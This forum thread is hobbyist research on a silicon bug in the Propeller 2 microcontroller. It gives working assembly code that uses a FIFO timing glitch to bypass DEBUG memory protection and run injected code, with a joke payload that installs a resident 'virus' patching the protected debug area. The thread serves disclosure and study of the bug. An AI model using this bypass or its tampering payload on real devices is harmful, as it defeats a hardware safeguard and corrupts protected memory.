Yes-a-silicon-bug: Bypassing DEBUG protection

Wuerfel_21 · 2024-08-15 14:41

(Original topic title: Not-a-silicon-bug: FIFO writes do not bypass DEBUG protection - crazy hack further down)

Just a random thing I was thinking about: Can the DEBUG memory protection be bypassed by setting up the FIFO to write into debug ram and then executing BRK?

Apparently not! It seems that the FIFO/streamer continue running in the background while the debugger is active, but can not write to debug RAM. I don't think this is documented anywhere. (@cgracey ?)

I might need to check what happens if the FIFO is started from within the debugger.

Here's some code that attempts to write a jump instruction into the debug handler, but it doesn't work like that:

_CLKFREQ = 100_000_000

PUB main()
pr0 := (%1111_1101100_0 << 20) + @haxx
pr1 := $FF840 + (cogid()^15)<<7
'pr1 := @test_buffer
pr2 := negx

org

  '' uncomment to trigger payload manually
  'jmp pr0

  wrpin #P_REPOSITORY,#0 addpins 3
  drvl #0 addpins 3
  nop
  nop
  wxpin pr0,#0
  shr pr0,#8
  wxpin pr0,#1
  shr pr0,#8
  wxpin pr0,#2
  shr pr0,#8
  wxpin pr0,#3

  setscp #64
  waitx #128
  getscp pr0

  wrfast #1,pr1
  setxfrq ##$1000_0000
  xinit ##X_4ADC8_0P_4DAC8_WFLONG|X_WRITE_ON|$FFFF,#0
  brk #1

end
debug(uhex_long(pr0,pr1))

debug("Pink fluffy unicorns dancing on Rainbows! The world is alright!",uhex_long_array(pr1,16),uhex_long(pr0,pr1))


DAT

              orgh
test_buffer   long 0[16]

              orgh
haxx
              loc ptra,#pwntext
.loop
              rdbyte pr0,ptra++ wz
.stop   if_z  jmp #.stop
.wait         rdpin pr1,#62 wc
        if_c  jmp #.wait
              drvl #62
              wypin pr0,#62
              jmp #.loop


pwntext byte "APPARITIONS STALK THE NIGHT AND ALL IS LOST!",10,13,0

evanh · 2024-08-15 18:19

My guess is the debug area will be writeable by the matching FIFO of the cog that has write access at the time. The moment that cog exits debug then the write access is removed for its FIFO too.

Wuerfel_21 · 2024-08-15 18:21

That's what happens here, but no. There's only only one cog active. By playing with the streamer parameters, you can see that it runs while the DEBUG interrupt is active (leaving the ORG/END section will kill it), but still can't write into the debug area.

evanh · 2024-08-15 18:30

Actually, all DEBUG()'s are a hubexec. The FIFO is reloaded before the write protect gets removed. I don't think you can test this.

I presume any streamer writes will vanish when the FIFO is configured as RDFAST. Although, those writes may possibly still cycle as a RFLONG and advance the FIFO, crashing the cog.

Wuerfel_21 · 2024-08-15 18:38

No, the debugger is specifically designed to not use hubexec because it can't reset the FIFO into just the right state (that really should have been fixed instead, it'd be really useful to start the FIFO part-way into a block). As said, the streamer actually keeps running, this I empirically verified (try setting the XFREQ to a low-ish value - when removing the BRK it will only fill a few slots of the buffer because the END will kill it, but with the BRK it keeps running while the debugger prints to the serial port for some couple hundred cycles.

My theory is that there's an extra signal that's only enabled when doing a regular synchronous WRxxxx instruction while in debug mode that overrides the memory protection.

evanh · 2024-08-15 18:42

I guess that shows how little attention I've paid to DEBUG.

Wuerfel_21 · 2024-08-15 18:43

Oh, another way to prove the FIFO keeps running during DEBUG is to set XFREQ to $8000_0000 and the streamer op to infinite length ($FFFF), as that will completely stall out the ROM's attempt to save $000..$00F and thus hang the CPU.

Wuerfel_21 · 2024-08-15 22:44

So here's how you actually bypass the debugger protection...

_CLKFREQ = 100_000_000
PUB main() | i
pr0 := (%1111_1101100_0 << 20) + @haxx
org
              mov 0-0,pr0
              debug("everything's fine... so far")
              mov pr0,##$80001
              rep @.hack,#1
              debug("oh no")
              wrfast #0,pr0
              setxfrq ##$8000_0000
              nop
              xinit ##X_4ADC8_0P_4DAC8_WFLONG|X_WRITE_ON|$0008,#0
              waitx #3
              rdfast ##negx,#0
.hack
end

repeat
  repeat i from 0 to 100
    debug(udec(i))
    waitms(1000)

DAT
              orgh
haxx
              loc ptrb,#pwntext
.loop
              rdbyte pr0,ptrb++ wz
        if_z  jmp #.stop
.wait         rdpin pr1,#62 wc
        if_c  jmp #.wait
              drvl #62
              wypin pr0,#62
              jmp #.loop
.stop
              ' install resident "virus".
              loc ptrb,#\$FC000
.infectloop   rdlong pr0,ptrb++
              cmp pr0,##812085059 wz
        if_nz jmp #.infectloop
              setbyte pr0,#72,#0
              wrlong pr0,ptrb[-1]

              brk #$10 ' re-enable debugger
              jmp #$1FD ' leave ISR

pwntext byte 79,73,78,75,32,79,73,78,75,32,77,79,84,72,69,82,70,82,73,67,75,69,82,33,10,13,0

Try running it for yourself! (only tested with flexspin)

Do I need a CVE for this? :P

evanh · 2024-08-16 08:19

Okay, I don't see how "haxx" gets run. I can tell the program size is important. If I change it then it stops working. I can see PR0 is initialised with a JMP #\ op-code and the address of haxx, but then the very first Pasm instruction MOV 0-0,pr0 doesn't make sense to me. Is it somehow used by the following DEBUG()?

Wuerfel_21 · 2024-08-16 09:09

The overall size shouldn't matter, it's just that every instruction here is load-bearing (including both DEBUG()s). The value placed in register zero is used by the "oh no" DEBUG, which is why you don't see that string printed.

evanh · 2024-08-16 09:47

I have no idea how the debug()'s can do that. How come I can't remove the NOP?

Wuerfel_21 · 2024-08-16 10:04

It's a load-bearing NOP. Though you can replace it with another 2-cycle instruction of choice. (I arrived at the correct timing for this by trial and error, don't know why it needs those cycles, but it sure does)

evanh · 2024-08-16 10:41

I still have no idea how "haxx" is launched.

Wuerfel_21 · 2024-08-16 10:47

Check the silicon doc for "Debug ROM" and take a good gander at what it does.

evanh · 2024-08-16 10:50

And what is "negx"?

Wuerfel_21 · 2024-08-16 11:12

Predefined constant for $80000000

Wuerfel_21 · 2024-08-16 16:39

I'm home again, so here's the mystery revealed...

The aforementioned debug ROM. It saves the first 16 registers and then loads 16 debugger bootstrap instructions into their place.

The theory of the exploit is based on the observation that asynchronous RDFASTs can interfere with regular RDLONG/WRLONG type instructions. Infact, it's very easy to observe that something simple like

rdfast ##negx,#0
debug("something")

is likely to corrupt the register saving (seemingly by cancelling it altogether - remember that). TODO: Does this mean you can never reliably single-step over RDFAST instructions?

However, by the time the ROM gets to loading the code, the FIFO has finished loading and no glitch occurs. Two methods are used to extend the time spent loading the FIFO while in DEBUG mode:

REP stalls interrupts, so using DEBUG/BRK within a REP block causes the debug interrupt to be delayed until directly after the last instruction in the REP block, as if that instruction itself was the BRK.
The FIFO has to flush all write data before it can switch into read mode, so the streamer is used to fill up the write FIFO just before starting the RDFAST.

This delays the FIFO startup enough to interfere with the code read, which causes $000 to not be loaded from hubRAM, keeping its previous value. By making this a jump instruction, arbitrary user code can be executed in debug mode. If you wanted to make an "invisible" version of this, you could load the 16 longs from $FFFC0 manually and jump into them, which would cause the interrupt to continue as usual.

The last piece of the puzzle then is the "everything's fine... so far" DEBUG. This is load-bearing because the ROM's register save also gets glitched. In effect this causes the previous values to persist in RAM, so simply doing a normal DEBUG before the exploit allows the saved registers to be correctly restored after the injected exploit code.

This also leads to the realization that if you change IJMP0 to point to custom code that doesn't immediately do hub access, this glitch won't work. (but that custom code would need to either be in memory that's writable, anyways or be hubexec in the debugger area (destroying FIFO state))

evanh · 2024-08-16 19:16

Oh, man, I'd blanked out that finding. It was traumatising! O_o

I've just been going over it again. I couldn't believe it would be a cancelling effect but that's looking to be what's going on. Sort of.

Adding a timer to the old test code sure enough reveals that the RDBYTE that gets screwed over is executing in less that 9 sysclock ticks. It's still sticking to its hubRAM slice but is short by a whole rotation.

evanh · 2024-08-16 20:00

@Wuerfel_21 said:
Does this mean you can never reliably single-step over RDFAST instructions?

Only for the non-blocking prefetch period. A normal RDFAST #0,addr doesn't have a problem.

Wuerfel_21 · 2024-08-16 20:41

Of course. Though it should still work in most cases (for single-step specifically), since RDFAST doesn't change any registers, so the previous ones should be fine. You'd have to be combining it with an autoincrementing ALTx where the counter is in a low register.

Rayman · 2024-08-17 00:46

Seems p2 needs some errata after all

Genetix · 2024-08-31 21:45

Rayman,

As an EE friend of mine says, "There is no perfect hardware and there is no perfect software."

Yes-a-silicon-bug: Bypassing DEBUG protection

Comments